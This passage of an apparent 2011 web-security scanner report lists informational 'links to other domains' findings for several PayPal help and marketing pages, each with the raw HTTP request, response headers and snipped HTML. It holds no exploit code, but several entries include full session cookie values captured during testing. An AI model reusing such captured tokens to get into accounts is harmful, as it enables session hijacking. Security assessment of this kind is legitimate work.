...[SNIP]...
<noscript><img
src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript"
height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

7.18. https://www.paypal.com/us/cgi-bin/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/us/cgi-bin/

Issue detail

The page was loaded from a URL containing a query string:

https://www.paypal.com/us/cgi-bin/?cmd=xpt/Customer/customerservice/GXOLogin-outside&from=resolution_center&toResCtr=true&fileWhat=claim

The response contains the following links to other domains:

https://paypal.112.2o7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript
https://www.paypal-labs.com/
https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/core/paypal.css
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/global.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/widgets.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/opinionlab/oo_engine.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_main.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_naturalsearch.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js
https://www.paypalobjects.com/en_US/i/icon/pp_favicon_x.ico
https://www.paypalobjects.com/en_US/i/logo/logo_ccAmex.gif
https://www.paypalobjects.com/en_US/i/logo/logo_ccDiscover.gif
https://www.paypalobjects.com/en_US/i/logo/logo_ccEcheck.gif
https://www.paypalobjects.com/en_US/i/logo/logo_ccMC.gif
https://www.paypalobjects.com/en_US/i/logo/logo_ccVisa.gif
https://www.paypalobjects.com/en_US/i/pui/apple-touch-icon.png
https://www.paypalobjects.com/en_US/i/scr/pixel.gif
https://www.paypalobjects.com/en_US/i/scr/scr_greyBarOR_31x248.gif
https://www.x.com/

Request

GET /us/cgi-bin/?cmd=xpt/Customer/customerservice/GXOLogin-outside&from=resolution_center&toResCtr=true&fileWhat=claim HTTP/1.1
Host: www.paypal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:48:26 GMT
Server: Apache
Set-Cookie: navcmd=xpt%2fCustomer%2fcustomerservice%2fGXOLogin-outside; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: navlns=0.0; expires=Thu, 07-Aug-2031 13:48:27 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: feel_cookie=a%2045%20xpt%2fCustomer%2fcustomerservice%2fGXOLogin-outside%20b%205%20_help%20c%206%20webscr%20d%207%20helpscr%20e%200%20%20f%200%20%20g%205%20en_US%20h%205%20en_US%20i%2045%20xpt%2fCustomer%2fcustomerservice%2fGXOLogin-outside%20j%2023%20xpt%2fHelp%2fhelpcenter%2fHC1%20k%2064%20PayPal%20Resolution%20Center%20-%20Report%20Problems%2c%20Dispute%20Transactions%20l%2066%20PayPal%20Help%20Center%20-%20Get%20Answers%20to%20Your%20PayPal%20Questions%20-%20PayPal%20; expires=Wed, 31-Dec-1969 23:59:59 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Vary: Accept-Encoding
Strict-Transport-Security: max-age=500
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18928

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:ns0="og" lang="en" ns0:xmlns="http://ogp.me/ns#"><head>
<meta http-equiv="Conte
...[SNIP]...
<meta http-equiv="X-UA-Compatible" content="IE=8"><link rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/core/paypal.css">

<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/opinionlab/oo_engine.js"></script>
...[SNIP]...
<li><a href="https://www.paypal-labs.com">PayPal Labs</a>
...[SNIP]...
</script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/widgets.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_naturalsearch.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js"></script>
...[SNIP]...
<noscript><img
src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript"
height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

7.19. https://www.paypal.com/us/cgi-bin/helpscr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/us/cgi-bin/helpscr

Issue detail

The page was loaded from a URL containing a query string:

https://www.paypal.com/us/cgi-bin/helpscr?cmd=_help&t=escalateTab

The response contains the following links to other domains:

https://paypal.112.2o7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript
https://www.paypal-labs.com/
https://www.paypalobjects.com/HELPWEB-640-20110207-1/css/core/global.css
https://www.paypalobjects.com/HELPWEB-640-20110207-1/css/core/print.css
https://www.paypalobjects.com/HELPWEB-640-20110207-1/css/help/chrome.css
https://www.paypalobjects.com/HELPWEB-640-20110207-1/css/help/curd.css
https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/agent.js
https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/curd.js
https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/lib/min/global.js
https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/lib/min/widgets.js
https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/opinionlab/oo_engine.js
https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/site_catalyst/pp_jscode_080706.js
https://www.paypalobjects.com/en_US/i/icon/icon_animated_prog_42wx42h.gif
https://www.paypalobjects.com/en_US/i/icon/pp_favicon_x.ico
https://www.paypalobjects.com/en_US/i/pui/apple-touch-icon.png
https://www.x.com/

Request

GET /us/cgi-bin/helpscr?cmd=_help&t=escalateTab HTTP/1.1
Host: www.paypal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:48:17 GMT
Server: Apache
Set-Cookie: help_cookie=; expires=Mon, 19-Sep-2011 01:48:18 GMT; domain=paypal.com; path=/; Secure; HttpOnly
Set-Cookie: feel_cookie=a%205%20_help%20b%200%20%20c%207%20helpscr%20d%200%20%20e%200%20%20f%200%20%20g%205%20en_US%20h%200%20%20i%2029%20xpt%2fHelp%2fhelpcenter%2fContactUs%20j%200%20%20k%2019%20Contact%20Us%20-%20PayPal%20l%200%20%20; expires=Wed, 31-Dec-1969 23:59:59 GMT; path=/; Secure; HttpOnly
Vary: Accept-Encoding
Strict-Transport-Security: max-age=500
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 117486

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:ns0="og" lang="en" ns0:xmlns="http://ogp.me/ns#"><head>
<meta http-equiv="Conte
...[SNIP]...
<meta http-equiv="X-UA-Compatible" content="IE=8"><link media="screen" rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/HELPWEB-640-20110207-1/css/core/global.css"><link media="screen" rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/HELPWEB-640-20110207-1/css/help/curd.css">

<link media="screen" rel="stylesheet" type="text/chrome" href="https://www.paypalobjects.com/HELPWEB-640-20110207-1/css/help/chrome.css">

<link media="print" rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/HELPWEB-640-20110207-1/css/core/print.css"><style type="text/css">
...[SNIP]...
</script><script type="text/javascript" src="https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/lib/min/global.js"></script>
...[SNIP]...
</script><link rel="shortcut icon" href="https://www.paypalobjects.com/en_US/i/icon/pp_favicon_x.ico"><link rel="apple-touch-icon" href="https://www.paypalobjects.com/en_US/i/pui/apple-touch-icon.png"></head>
...[SNIP]...
<div class="loading_message"><img src="https://www.paypalobjects.com/en_US/i/icon/icon_animated_prog_42wx42h.gif" border="0" alt="">We're finding answers...</div>
...[SNIP]...
<li><a href="https://www.x.com/">PayPal Developers</a>
...[SNIP]...

<script type="text/javascript" src="https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/opinionlab/oo_engine.js"></script>
...[SNIP]...
<li><a href="https://www.paypal-labs.com">PayPal Labs</a>
...[SNIP]...
</div><script type="text/javascript" src="https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/lib/min/widgets.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/agent.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/curd.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/site_catalyst/pp_jscode_080706.js"></script>
...[SNIP]...
<noscript><img
src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript"
height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

7.20. https://www.paypal.com/us/cgi-bin/helpscr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/us/cgi-bin/helpscr

Issue detail

The page was loaded from a URL containing a query string:

https://www.paypal.com/us/cgi-bin/helpscr?cmd=_home

The response contains the following links to other domains:

https://paypal.112.2o7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript
https://securepics.ebaystatic.com/aw/pics/paypal/site/us/2011/imgSecRF0711_560wx228.jpg
https://securepics.ebaystatic.com/aw/pics/paypal/site/us/2011/imgSecuritP1_750x70.gif
https://www.paypal-labs.com/
https://www.paypalobjects.com/WEBSCR-640-20110722-1/Marketing/css/pages/ConsumerRevamp.css
https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/core/core.css
https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/marketing/marketing.css
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/iconix.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/global.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/widgets.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/opinionlab/oo_engine.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pageBlockingUnsafeBrowsers.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_naturalsearch.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/tns/mid.js
https://www.paypalobjects.com/en_US/Marketing/i/scr/scr_cpr_graydots_547x1.gif
https://www.paypalobjects.com/en_US/i/icon/pp_favicon_x.ico
https://www.paypalobjects.com/en_US/i/logo/logo_VIPwhite_66x27.gif
https://www.paypalobjects.com/en_US/i/pui/apple-touch-icon.png
https://www.paypalobjects.com/js/tns/min/bid.js
https://www.x.com/

Request

GET /us/cgi-bin/helpscr?cmd=_home HTTP/1.1
Host: www.paypal.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:48:17 GMT
Server: Apache
Cache-Control: private
Pragma: no-cache
Expires: Thu, 05 Jan 1995 22:00:00 GMT
Set-Cookie: navcmd=_home-general; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: cwrClyrK4LoCV1fydGbAxiNL6iG=r8jrAA0cX4Huuekz8b3KsLceEQ-CI32oWFiYPcxQz5PAxbn1pj9zEu5_YWJKcLI-FZm5jP7RCNTPn9pOIxaHakZ1Oy75k9JizPSSZ68lBJwb8strQM0NRo1nyCz0B4GmZVMVaG%7cTVA53jSrvERuvSOA7_C6IChutrh77kYpu3GedjoIiNmPvAnuOJU8fImIicwetHt5acDUK0%7cJlqiLcugqxkWGPBl-i2C6vvtUDhrLAULkRZ2TAS5a_kkPTjurigT_b3zi1uzMvpM59ThLG%7c1313156898; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: navlns=0.0; expires=Thu, 07-Aug-2031 13:48:18 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Set-Cookie: feel_cookie=a%205%20_home%20b%205%20_help%20c%206%20webscr%20d%207%20helpscr%20e%200%20%20f%200%20%20g%205%20en_US%20h%205%20en_US%20i%2045%20xpt%2fMarketing_CommandDriven%2fhomepage%2fMainHome%20j%2023%20xpt%2fHelp%2fhelpcenter%2fHC1%20k%2063%20Send%20Money%2c%20Pay%20Online%20or%20Set%20Up%20a%20Merchant%20Account%20with%20PayPal%20l%2066%20PayPal%20Help%20Center%20-%20Get%20Answers%20to%20Your%20PayPal%20Questions%20-%20PayPal%20; expires=Wed, 31-Dec-1969 23:59:59 GMT; domain=.paypal.com; path=/; Secure; HttpOnly
Vary: Accept-Encoding
Strict-Transport-Security: max-age=500
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24882

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:ns0="og" lang="en" ns0:xmlns="http://ogp.me/ns#"><head>
<meta http-equiv="Conte
...[SNIP]...
<meta http-equiv="X-UA-Compatible" content="IE=8"><link media="all" rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/core/core.css"><link media="screen" rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/marketing/marketing.css"><link media="screen" rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/WEBSCR-640-20110722-1/Marketing/css/pages/ConsumerRevamp.css">

<link rel="apple-touch-icon" href="https://www.paypalobjects.com/en_US/i/pui/apple-touch-icon.png"><style type="text/css" id="antiClickjack">
...[SNIP]...
</style><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/global.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/tns/mid.js"></script>
...[SNIP]...
</script><link rel="shortcut icon" href="https://www.paypalobjects.com/en_US/i/icon/pp_favicon_x.ico"></head>
...[SNIP]...
f=https://www.paypal.com/us/cgi-bin/webscr?cmd=_mpi-click-outside&cid=8444&oid=49775&bn=AjYsXGN6DA8XUCUfQBA&s=NAo3MxA&landing_url=ORAcFnkYQgcdFgwCQFsADwo8KBopNBZsFSYkQDgsRQoGSHRsYAZlZEZUYQhnRXNWYlRFUw><img src='https://securepics.ebaystatic.com/aw/pics/paypal/site/us/2011/imgSecRF0711_560wx228.jpg' border='0' alt=''/></a>
...[SNIP]...
</div><img src="https://www.paypalobjects.com/en_US/Marketing/i/scr/scr_cpr_graydots_547x1.gif" border="0" class="dottedline" alt=""><p class="acceptCredit">
...[SNIP]...
f=https://www.paypal.com/us/cgi-bin/webscr?cmd=_mpi-click-outside&cid=8444&oid=49777&bn=AjYsXGN6DA8XUCUfQBA&s=NAo3MxA&landing_url=ORAcFnkYQgcdFgwCQFsADwo8KBopNBZsFSYkQDgsRQoGSHRsYAZlZEZUYQhnRXNWYlRFUQ><img src='https://securepics.ebaystatic.com/aw/pics/paypal/site/us/2011/imgSecuritP1_750x70.gif' border='0' alt=''/></a>
...[SNIP]...
<li><a href="https://www.x.com/">PayPal Developers</a>
...[SNIP]...

<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/opinionlab/oo_engine.js"></script>
...[SNIP]...
<li><a href="https://www.paypal-labs.com">PayPal Labs</a>
...[SNIP]...
<a target="_blank" href="https://www.paypal.com/us/cgi-bin/webscr?cmd=xpt/Customer/popup/SecurityKeyVIP-outside" onClick="PAYPAL.core.openWindow(event, {width: 425, height: 350})"><img border="0" src="https://www.paypalobjects.com/en_US/i/logo/logo_VIPwhite_66x27.gif" alt=""></a>
...[SNIP]...
</div><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/widgets.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/iconix.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pageBlockingUnsafeBrowsers.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/js/tns/min/bid.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_naturalsearch.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js"></script>
...[SNIP]...
<noscript><img
src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript"
height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

7.21. https://www.paypal.com/us/cgi-bin/helpweb previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/us/cgi-bin/helpweb

Issue detail

The page was loaded from a URL containing a query string:

https://www.paypal.com/us/cgi-bin/helpweb?cmd=_help

The response contains the following links to other domains:

https://paypal.112.2o7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript
https://www.paypal-community.com/t5/us/ct-p/us
https://www.paypal-labs.com/
https://www.paypalobjects.com/HELPWEB-640-20110207-1/css/core/global.css
https://www.paypalobjects.com/HELPWEB-640-20110207-1/css/core/print.css
https://www.paypalobjects.com/HELPWEB-640-20110207-1/css/help/hc1.css
https://www.paypalobjects.com/HELPWEB-640-20110207-1/css/help/hc1_chrome.css
https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/hc1.js
https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/lib/min/global.js
https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/lib/min/widgets.js
https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/lib/yui/element.js
https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/opinionlab/oo_engine.js
https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/site_catalyst/pp_jscode_080706.js
https://www.paypalobjects.com/en_US/i/icon/pp_favicon_x.ico
https://www.paypalobjects.com/en_US/i/pui/apple-touch-icon.png
https://www.x.com/
https://www1.paypal-virtualchat.com/

Request

GET /us/cgi-bin/helpweb?cmd=_help HTTP/1.1
Host: www.paypal.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://cms.paypal.com/us/cgi-bin/?cmd=_render-content&content_ID=ua/CEAgreement_full
Cookie: cwrClyrK4LoCV1fydGbAxiNL6iG=aoZQvwXnpHluzOk7xhjmf0PMKNRdIVjfjkwRJkH0WHSCc_8xdESUtiR92YojOK4d8fPUe8039BAMPe0lkJdURiLx8TN_TW_1s8STbYNqZMjjfGf78oTaluFmGi2vLCawm0L-Dm%7cKCcYeNx26ncV9woIxidLpWBlvM2P-apdRSZFl3m_LbX2WQwmWH-z-dsLYusl_O-ES5k0i0%7cmtijiXZuPSV3kyj6Q94Y4zdws77PbwG-L8-dHyJkdT_oZI_fZpfuPH5mj4WOkYpeUDQWgG%7c1313112160; KHcl0EuY7AKSMgfvHl7J5E7hPtK=OGXUOFHbwQ9WE3sALZ1qIFid-EZw9v8a_qL0LLVFCQKL5SI2sHzGcjrqppn1hBQoGV8q5Xx7qjDOH9OJ; cookie_check=yes; navcmd=_home-general; consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; navlns=0.0; Apache=10.190.9.198.1313112159974960; s_sess=%20s_cc%3Dtrue%3B%20s_ppv%3D49%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3Dua%252Fceagreement_full%253A%253A%255E%255EHelp%255E%255Eua%252Fceagreement_full%253A%253A%2520%257C%2520Help%255E%255E%3B%20s_sq%3Dpaypalglobal%253D%252526pid%25253Dua%2525252Fceagreement_full%2525253A%2525253A%252526pidt%25253D1%252526oid%25253Dhttps%2525253A%2525252F%2525252Fwww.paypal.com%2525252Fus%2525252Fcgi-bin%2525252Fhelpweb%2525253Fcmd%2525253D_help%252526ot%25253DA%3B; s_pers=%20tr_p1%3Dua%252Fceagreement_full%253A%253A%7C1313116121181%3B%20gpv_c43%3Dua%252Fceagreement_full%253A%253A%7C1313116142019%3B%20gpv_events%3Dno%2520value%7C1313116143366%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 02:00:34 GMT
Server: Apache
Set-Cookie: help_cookie=; expires=Sun, 18-Sep-2011 14:00:36 GMT; domain=paypal.com; path=/; Secure; HttpOnly
Set-Cookie: feel_cookie=a%205%20_help%20b%200%20%20c%207%20helpscr%20d%200%20%20e%200%20%20f%200%20%20g%205%20en_US%20h%200%20%20i%2023%20xpt%2fHelp%2fhelpcenter%2fHC1%20j%200%20%20k%2066%20PayPal%20Help%20Center%20-%20Get%20Answers%20to%20Your%20PayPal%20Questions%20-%20PayPal%20l%200%20%20; expires=Wed, 31-Dec-1969 23:59:59 GMT; path=/; Secure; HttpOnly
Vary: Accept-Encoding
Strict-Transport-Security: max-age=500
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 178803

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:ns0="og" lang="en" ns0:xmlns="http://ogp.me/ns#"><head>
<meta http-equiv="Conte
...[SNIP]...
<meta http-equiv="X-UA-Compatible" content="IE=8"><link media="screen" rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/HELPWEB-640-20110207-1/css/core/global.css"><link media="screen" rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/HELPWEB-640-20110207-1/css/help/hc1.css">

<link media="screen" rel="stylesheet" type="text/chrome" href="https://www.paypalobjects.com/HELPWEB-640-20110207-1/css/help/hc1_chrome.css">

<link media="print" rel="stylesheet" type="text/css" href="https://www.paypalobjects.com/HELPWEB-640-20110207-1/css/core/print.css"><style type="text/css">
...[SNIP]...
</script><script type="text/javascript" src="https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/lib/min/global.js"></script>
...[SNIP]...
</script><link rel="shortcut icon" href="https://www.paypalobjects.com/en_US/i/icon/pp_favicon_x.ico"><link rel="apple-touch-icon" href="https://www.paypalobjects.com/en_US/i/pui/apple-touch-icon.png"></head>
...[SNIP]...
<div id="hc_callout_left_content"><a target="_blank" href="https://www1.paypal-virtualchat.com" onClick="javascript:virtualWin=openVirtualWin('https://www1.paypal-virtualchat.com', virtualWin)">Ask Sarah</a>
...[SNIP]...
<div id="hc_callout_right_content"><a href="https://www.paypal-community.com/t5/us/ct-p/us" id="cllt">Community Help Forum</a>
...[SNIP]...
<li><a href="https://www.x.com/">PayPal Developers</a>
...[SNIP]...

<script type="text/javascript" src="https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/opinionlab/oo_engine.js"></script>
...[SNIP]...
<li><a href="https://www.paypal-labs.com">PayPal Labs</a>
...[SNIP]...
</div><script type="text/javascript" src="https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/lib/min/widgets.js"></script><script type="text/javascript" src="https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/lib/yui/element.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/hc1.js"></script>
...[SNIP]...

<script type="text/javascript" src="https://www.paypalobjects.com/HELPWEB-640-20110207-1/js/site_catalyst/pp_jscode_080706.js"></script>
...[SNIP]...
<noscript><img
src="//paypal.112.2O7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript"
height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...

7.22. https://www.paypal.com/us/cgi-bin/marketingweb previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.paypal.com
Path:	/us/cgi-bin/marketingweb

Issue detail

The page was loaded from a URL containing a query string:

https://www.paypal.com/us/cgi-bin/marketingweb?cmd=xpt/Marketing/general/SiteMap-outside

The response contains the following links to other domains:

https://paypal.112.2o7.net/b/ss/paypalglobal/1/H.6--NS/0?pageName=NonJavaScript
https://www.paypal-community.com/
https://www.paypal-labs.com/
https://www.paypal-marketing.com/emarketing/partner/portal/landing.page
https://www.paypal-media.com/aboutus.cfm
https://www.paypal-media.com/awards.cfm
https://www.paypal-media.com/contactus.cfm
https://www.paypal-media.com/events.cfm
https://www.paypal-media.com/inthenews.cfm
https://www.paypal-media.com/management.cfm
https://www.paypal-media.com/mediacenter.cfm
https://www.paypal-media.com/releases.cfm
https://www.paypal-media.com/state_licenses.cfm
https://www.paypal-shopping.com/
https://www.paypal-shopping.com/shop-stores.html
https://www.paypal.at/
https://www.paypal.be/
https://www.paypal.ca/
https://www.paypal.ch/
https://www.paypal.de/
https://www.paypal.es/
https://www.paypal.fr/
https://www.paypal.it/
https://www.paypal.jp/
https://www.paypal.nl/
https://www.paypal.pl/
https://www.paypalobjects.com/WEBSCR-640-20110722-1/css/core/paypal.css
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/global.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/lib/min/widgets.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/opinionlab/oo_engine.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_main.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/pp_naturalsearch.js
https://www.paypalobjects.com/WEBSCR-640-20110722-1/js/site_catalyst/pp_jscode_080706.js
https://www.paypalobjects.com/en_US/i/icon/pp_favicon_x.ico
https://www.paypalobjects.com/en_US/i/pui/apple-touch-icon.png
https://www.thepaypalblog.com/
https://www.x.com/

Request

GET /us/cgi-bin/marketingweb?cmd=xpt/Marketing/general/SiteMap-outside HTTP/1.1
Host: www.paypal.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://cms.paypal.com/us/cgi-bin/?cmd=_render-content&content_ID=ua/CEAgreement_full
Cookie: KHcl0EuY7AKSMgfvHl7J5E7hPtK=OGXUOFHbwQ9WE3sALZ1qIFid-EZw9v8a_qL0LLVFCQKL5SI2sHzGcjrqppn1hBQoGV8q5Xx7qjDOH9OJ; cookie_check=yes; consumer_display=USER_HOMEPAGE%3d0%26USER_TARGETPAGE%3d0%26USER_FILTER_CHOICE%3d0%26BALANCE_MODULE_STATE%3d1%26GIFT_BALANCE_MODULE_STATE%3d1%26LAST_SELECTED_ALIAS_ID%3d0%26SELLING_GROUP%3d1%26PAYMENT_AND_RISK_GROUP%3d1%26SHIPPING_GROUP%3d1; navlns=0.0; Apache=10.190.9.198.1313112159974960; cwrClyrK4LoCV1fydGbAxiNL6iG=%7cPUUJ8n6svxMPOYKuqe4Vt8wKSbX_g466vH_UPgXVt-HMeJJOUdE5GhABxWNHI64TAYVLkG%7cPFIMUwP8WbNWGTAGHvoHa36exDF_hTyF_U5S0DvwX2i_d0j2TxNo6Hbmi4Kwm3FyHIafJG%7c; s_sess=%20v20%3Dxss%3B%20s_cc%3Dtrue%3B%20tr_p1%3Dua%252Fceagreement_full%253A%253A%3B%20s_ppv%3D100%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3Dua%252Fceagreement_full%253A%253A%255E%255ESite%2520Map%255E%255Eua%252Fceagreement_full%253A%253A%2520%257C%2520Site%2520Map%255E%255E%3B%20s_sq%3Dpaypalglobal%253D%252526pid%25253Dua%2525252Fceagreement_full%2525253A%2525253A%252526pidt%25253D1%252526oid%25253Dhttps%2525253A%2525252F%2525252Fwww.paypal.com%2525252Fus%2525252Fcgi-bin%2525252Fmarketingweb%2525253Fcmd%2525253Dxpt%2525252FMarketing%2525252Fgeneral%2525252FSiteMap-outside%252526ot%25253DA%3B; s_pers=%20gpv_c43%3Dua%252Fceagreement_full%253A%253A%7C1313162029330%3B%20gpv_events%3Dno%2520value%7C1313162030686%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 14:43:06 GMT
Server: Apache
Set-Cookie: navcmd=xpt%2fMarketing%2fgeneral%2fSiteMap-outside; domain=.paypal.com; path=/; Secure; HttpOnly
